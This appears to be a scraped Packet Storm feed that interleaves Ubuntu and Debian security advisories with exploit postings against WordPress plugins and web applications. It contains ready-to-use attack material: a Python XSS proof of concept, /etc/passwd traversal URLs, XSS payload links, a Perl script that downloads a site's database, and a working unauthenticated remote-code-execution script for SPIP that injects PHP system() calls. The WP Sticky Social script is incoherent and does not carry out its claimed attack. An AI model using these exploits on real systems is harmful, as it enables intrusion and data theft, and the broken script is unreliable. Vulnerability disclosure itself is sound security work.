WordPress Super Socializer plugin version 7.13.52 suffers from a cross site scripting vulnerability.

    # Exploit Title: Super Socializer 7.13.52 - Reflected XSS# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/super-socializer# Version: 7.13.52 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-2779import requests# The URL of the vulnerable AJAX endpointurl = "https://example.com/wp-admin/admin-ajax.php"# The vulnerable parameter that is not properly sanitized and escapedvulnerable_param = "<img src=x onerror=alert(document.domain)>"# The payload that exploits the vulnerabilitypayload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}# Send a POST request to the vulnerable endpoint with the payloadresponse = requests.post(url, data=payload)# Check if the payload was executed by searching for the injected script tagif "<img src=x onerror=alert(document.domain)>" in response.text:    print("Vulnerability successfully exploited")else:    print("Vulnerability not exploitable")

WordPress Super Socializer 7.13.52 Cross Site Scripting

Ubuntu Security Notice 6143-3 - USN-6143-1 fixed vulnerabilities and USN-6143-2 fixed minor regressions in Firefox. The update introduced several minor regressions. This update fixes the problem. Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Jun Kokatsu discovered that Firefox did not properly validate site-isolated process for a document loaded from a data: URL that was the result of a redirect, leading to an open redirect attack. An attacker could possibly use this issue to perform phishing attacks.

    ==========================================================================Ubuntu Security Notice USN-6143-3June 21, 2023firefox regressions==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:USN-6143-2 caused some minor regressions in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:USN-6143-1 fixed vulnerabilities and USN-6143-2 fixed minor regressions inFirefox. The update introduced several minor regressions. This update fixesthe problem.We apologize for the inconvenience.Original advisory details: Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. (CVE-2023-34414, CVE-2023-34416, CVE-2023-34417)  Jun Kokatsu discovered that Firefox did not properly validate site-isolated process for a document loaded from a data: URL that was the result of a redirect, leading to an open redirect attack. An attacker could possibly use this issue to perform phishing attacks. (CVE-2023-34415)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         114.0.2+build1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6143-3  https://ubuntu.com/security/notices/USN-6143-1  https://launchpad.net/bugs/2024513Package Information:  https://launchpad.net/ubuntu/+source/firefox/114.0.2+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6143-3

Accent Microcomputers CMS version 2.4 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Accent Microcomputers CMS v 2.4 Directory Traversal Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Telegram  : @indoushka                                                                                                         || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://www.accent.com.pl                                                                                           |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : ../../../../../../../../../etc/passwdhttp://127.0.0.1/www/mmrtradingpl/index.php?id=50&file=../../../../../../../../../etc/passwdhttp://127.0.0.1/www/transcomfortpl/index.php?id=50&file=../../../../../../../../../etc/passwd=====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh        |============================================================================================================================================

Accent Microcomputers CMS 2.4 Directory Traversal

PHP Car Dealer version 3.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/autodealer/                                    ││  Vendor   : NetArt Media                                                               ││  Software : PHP Car Dealer 3.0                                                         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://www.website/index.php?page=en_Latest%20Listings&page=en_Latest%20Listings&order_by=price_max&bprcc"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"madvv=1[-] Done

PHP Car Dealer 3.0 Cross Site Scripting

Debian Linux Security Advisory 5433-1 - Gregory James Duck reported that missing input validation in various functions provided by libx11, the X11 client-side library, may result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5433-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJune 21, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libx11CVE ID         : CVE-2023-3138Debian Bug     : 1038133Gregory James Duck reported that missing input validation in variousfunctions provided by libx11, the X11 client-side library, may result indenial of service.For the oldstable distribution (bullseye), this problem has been fixedin version 2:1.7.2-1+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 2:1.8.4-2+deb12u1.We recommend that you upgrade your libx11 packages.For the detailed security status of libx11 please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/libx11Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmSSwdZfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0RK+xAAlgl5li8mTpTB5e+HbDF5DSrw8BtyiKKrn8X/D35DuLwPE14MoT1u9yx07mqUjuNkQjOyQ4DS4DW+UZlk+q4ljlj2lw2qTvtSXVgw42VWVyZGnZfeuH+Bhdmqcf5jxD69+3TdmIn3iC1egTUUlUm1aUS6h0GvioFF+QZ+Nbu43QpiPMe4EEOSLauFb9l6CJMo4bfN6+luKX5q/wd9sG2P5aHEPpp1UXphFDfi3XjITsLJthDGwKOk0B6M+AQcEO9sTMZiwdK9iIK1ySg1oJpaQtTie2MdXJynIs0PA2uYQa6ORwXYwsv4FdpvMSSF4mHfkzninuGcSfkH0FN+zS4H28Qh/nflrTCf1i4fCmS5Nn9k+Hfueo4B4NeTIIA2HnaNItWePD7KBo6griGpRU4L1xcktx2x4VAwOz7zSLq+Ydd0xEdGj1oM2LpwC/euNCesBhonBuYWuKiZCp10zirPdgupm9K9x974OtnnkeJ+gvfUYgzGtELUQ4efNqIAks1HlGmqZSfgtEjTYFFMVKd7OUSaLUxbrxdzttnXVYHSFfn8o1ESt/JxBosg78DhI/LognZM9/XyXDkmEpDhB0RPN7AIy+t0dKcn53eTBaERy+ES4HXL8dflSbbJIopa8jVXqkyZ+gqu94jYGXYHmKmzd8TwlL6fRvC2/Jg3LYWYBEQ==XLRD-----END PGP SIGNATURE-----

Debian Security Advisory 5433-1

WordPress WP Sticky Social plugin version 1.0.1 suffers from cross site request forgery and cross site scripting vulnerabilities.

    # Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)#  Dork: inurl:~/admin/views/admin.php# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social# Version: 1.0.1 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-3320import requestsimport hashlibimport time# Set the target URLurl = "http://example.com/wp-admin/admin.php?page=wpss_settings"# Set the user agent stringuser_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"# Generate the nonce valuenonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()# Set the data payloadpayload = {    "wpss_nonce": nonce,    "wpss_setting_1": "value_1",    "wpss_setting_2": "value_2",    # Add additional settings as needed}# Set the request headersheaders = {    "User-Agent": user_agent,    "Referer": url,    "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",    # Add additional headers as needed}# Send the POST requestresponse = requests.post(url, data=payload, headers=headers)# Check the response status codeif response.status_code == 200:    print("Request successful")else:    print("Request failed")

WordPress WP Sticky Social 1.0.1 CSRF / Cross Site Scripting

Ubuntu Security Notice 5948-2 - USN-5948-1 fixed vulnerabilities in Werkzeug. This update provides the corresponding updates for Ubuntu 23.04. It was discovered that Werkzeug did not properly handle the parsing of nameless cookies. A remote attacker could possibly use this issue to shadow other cookies.

==========================================================================  
Ubuntu Security Notice USN-5948-2  
June 20, 2023

python-werkzeug vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04

Summary:

Several security issues were fixed in Werkzeug.

Software Description:  
- python-werkzeug: collection of utilities for WSGI applications

Details:

USN-5948-1 fixed vulnerabilities in Werkzeug. This update provides the  
corresponding updates for Ubuntu 23.04.

Original advisory details:

  It was discovered that Werkzeug did not properly handle the parsing of  
  nameless cookies. A remote attacker could possibly use this issue to  
  shadow other cookies. (CVE-2023-23934)

  It was discovered that Werkzeug could be made to process unlimited number  
  of multipart form data parts. A remote attacker could possibly use this  
  issue to cause Werkzeug to consume resources, leading to a denial of  
  service. (CVE-2023-25577)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   python3-werkzeug                2.2.2-2ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5948-2  
   https://ubuntu.com/security/notices/USN-5948-1  
   CVE-2023-23934, CVE-2023-25577

Package Information:  
https://launchpad.net/ubuntu/+source/python-werkzeug/2.2.2-2ubuntu0.1

Ubuntu Security Notice USN-5948-2

A Cart version 2.0 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : A cart 2.0 Database Disclosure Exploit                                                                             |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://ToastForums.com                                                                                             |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (acart.mdb ) file  
    The (acart.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# A_cart 2.0 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
system('A_cart 2.0 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="acart2_0.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/acart2_0.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/acart2_0.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :==============================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |   
============================================================================================

A Cart 2.0 Database Disclosure

3CX Open Standards Software IP PBX Thailand version 2.0.3 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : 3CX Open Standards Software IP PBX Thailand v 2.0.3 XSS Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://3cx.com                                                                                                    |  | # Dork      : intext:''3CX: Open Standards Software IP PBX''                                                                     |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /eventdetail.php?type_id=43&events_id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  http://127.0.0.1/3cx/eventdetail.php?type_id=43&events_id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

3CX Open Standards Software IP PBX Thailand 2.0.3 Cross Site Scripting

SPIP versions 4.2.1 and below suffer from an unauthenticated remote code execution vulnerability.

    #!/usr/bin/env python3# -*- coding: utf-8 -*-# Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated)# Google Dork: inurl:"/spip.php?page=login"# Date: 19/06/2023# Exploit Author: nuts7 (https://github.com/nuts7/CVE-2023-27372)# Vendor Homepage: https://www.spip.net/# Software Link: https://files.spip.net/spip/archives/# Version: < 4.2.1 (Except few fixed versions indicated in the description)# Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0# CVE reference : CVE-2023-27372 (coiffeur)# CVSS : 9.8 (Critical)## Vulnerability Description:## SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.# This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.## Usage: python3 CVE-2023-27372.py http://example.comimport argparseimport bs4import htmlimport requestsdef parseArgs():    parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7")    parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL")    parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute")    parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)")    return parser.parse_args()def get_anticsrf(url):    r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10)    soup = bs4.BeautifulSoup(r.text, 'html.parser')    csrf_input = soup.find('input', {'name': 'formulaire_action_args'})    if csrf_input:        csrf_value = csrf_input['value']        if options.verbose:            print("[+] Anti-CSRF token found : %s" % csrf_value)        return csrf_value    else:        print("[-] Unable to find Anti-CSRF token")        return -1def send_payload(url, payload):    data = {        "page": "spip_pass",        "formulaire_action": "oubli",        "formulaire_action_args": csrf,        "oubli": payload    }    r = requests.post('%s/spip.php?page=spip_pass' % url, data=data)    if options.verbose:        print("[+] Execute this payload : %s" % payload)    return 0if __name__ == '__main__':    options = parseArgs()    requests.packages.urllib3.disable_warnings()    requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'    try:        requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'    except AttributeError:        pass    csrf = get_anticsrf(url=options.url)    send_payload(url=options.url, payload="s:%s:\"<?php system('%s'); ?>\";" % (20 + len(options.command), options.command))

Source

Packet Storm